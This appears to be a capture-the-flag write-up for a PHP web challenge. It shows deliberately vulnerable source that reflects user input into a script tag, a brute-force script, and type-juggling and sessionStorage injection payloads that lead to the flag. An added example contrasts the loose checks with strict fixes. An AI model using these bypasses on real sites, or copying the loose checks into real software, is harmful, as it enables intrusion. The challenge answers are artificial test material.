Web 1
<?php
highlight_file(__FILE__);
error_reporting(E_ALL);
ini_set('display_errors', 0);
$flag1 = 0;
$a = $_GET['a'];
$b = $_GET['b'];
if(isset($a) && strpos(base64_decode('MW82MmU3ZTYxZTQzZTk0YTE='),$a) && floatval($a) < 10000000 && floatval($a) > 6000000 && strlen($a) <= 4){
    $obj = (object)$b;
    if(isset($b) && strpos(strrchr(md5(sha1($obj->scalar)),'b1'),'fca7')){
        $flag1 = 1;
        echo "You're ok flag"."\n";
        $c = isset($_GET['c']) ? $_GET['c'] : '';
        $c = urldecode($c);
        if (isset($c) && preg_match('/setItem\s*\(\s*[\'"](.+?)[\'"]\s*,\s*(\[.*\])\s*\)/', $c, $matches)) {
            $m = $matches[1];
            $n = $matches[2];
            $value = json_decode($n, true);
            if (json_last_error() === JSON_ERROR_NONE) {
                $result = [$m, $value];
                if(is_array($result[1]) && is_numeric($result[1][1]) && !is_numeric($result["0"]) && $result["0"] > 2024 ){
                    if($result[1][1] == "9999999999999999" && $result[1][1] !== "9999999999999999"){
                        $i = $result[0];
                        echo "<script>$c</script>";
                        echo "<script>
                        var t = window.sessionStorage.getItem('".$i."');
                        console.log(t)
                        const url = 'inc.php?flag1=".$flag1."&value=' + encodeURIComponent(t);
                        window.location.href = url;
                        </script>";
                    }else{
                        die("Emmm...");
                    }
                }else{
                    die("Emmm...");;
                }
            } else {
                die("Emmm...");;
            }
        } else {
            die("Emmm...");;
        }
    } else { die("Emmm..."); }
} else { die("Emmm..."); }
?>
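1. Decoding MW82MmU3ZTYxZTQzZTk0YTE= gives 1o62e7e61e43e94a1. Combined with the later conditions that a must be less than 10000000 and greater than 6000000 (and, per the strlen check, at most 4 characters long), this gives a = 7e6, which floatval() reads as 7000000.
2. Write a simple script to brute-force b: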
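<?php
// Increment b until the challenge's condition on md5(sha1(b)) holds.
$b=1;
$obj = (object)$b;
while(!strpos(strrchr(md5(sha1($obj->scalar)),'b1'),'fca7')){
    $b++;
    $obj = (object)$b;
}
echo $b; // print the first value that passes the check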
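This gives b = 591.
3. Loose equality (==) has a precision problem, so a number with an extremely small fractional part can be used to bypass it, whereas strict equality (===) does not have this problem. The loose comparison gives '2025a'. Finally, construct c to match the regular expression: sessionStorage.setItem('2025a',[123,9999999999999999.0000000000001])
4. After landing on inc.php, viewing the page source shows the word base85, so try base85-decoding the cookie: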
import base64
data = "Ao(mgHUKl=<&\\AbEBu<QF]NB_COH"  # note: the backslash must be escaped
flag = base64.a85decode(data)  # or base64.b85decode(data)
print(flag)
This yields the flag: flag{D9xT7ePqA1LuVnYk}
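
The loose checks from steps 1 and 3 next to stricter forms that reject the same inputs, as an added example that is not part of the challenge or of the original writeup. The function names loose_a, strict_a, loose_n and strict_n are hypothetical, the inputs are the writeup's values, and a 64-bit PHP build is assumed.

```php
<?php
// Added example, not the challenge's own code.
$haystack = base64_decode('MW82MmU3ZTYxZTQzZTk0YTE=');   // "1o62e7e61e43e94a1"

// Check on a, as written in the challenge.
function loose_a(string $a, string $haystack): bool {
    return strpos($haystack, $a)        // used as a boolean: offset 0 counts as "not found"
        && floatval($a) < 10000000
        && floatval($a) > 6000000       // floatval() accepts exponent notation
        && strlen($a) <= 4;
}

// Stricter form: decimal digits only, explicit "found" test, integer range.
function strict_a(string $a, string $haystack): bool {
    return ctype_digit($a)
        && strpos($haystack, $a) !== false
        && (int)$a > 6000000 && (int)$a < 10000000;
}

// Check on the second array element, as written in the challenge.
function loose_n($v): bool {
    // == converts the numeric string and compares as floats, so nearby
    // values collapse onto the same double; !== only compares type/value.
    return is_numeric($v) && $v == "9999999999999999" && $v !== "9999999999999999";
}

// Stricter form: the decoded JSON value must be an integer with exactly that value.
function strict_n($v): bool {
    return is_int($v) && $v === 9999999999999999;
}

// Constructed inputs: the values the writeup uses.
$a = '7e6';
$n = json_decode('[123,9999999999999999.0000000000001]', true)[1]; // decoded as a float

echo "strpos offset / floatval of a:\n";
var_dump(strpos($haystack, $a), floatval($a));
echo "loose_a vs strict_a:\n";
var_dump(loose_a($a, $haystack), strict_a($a, $haystack));
echo "loose_n vs strict_n:\n";
var_dump(loose_n($n), strict_n($n));
```

Running it with the PHP CLI shows both loose checks accepting the writeup's inputs while the strict forms reject them.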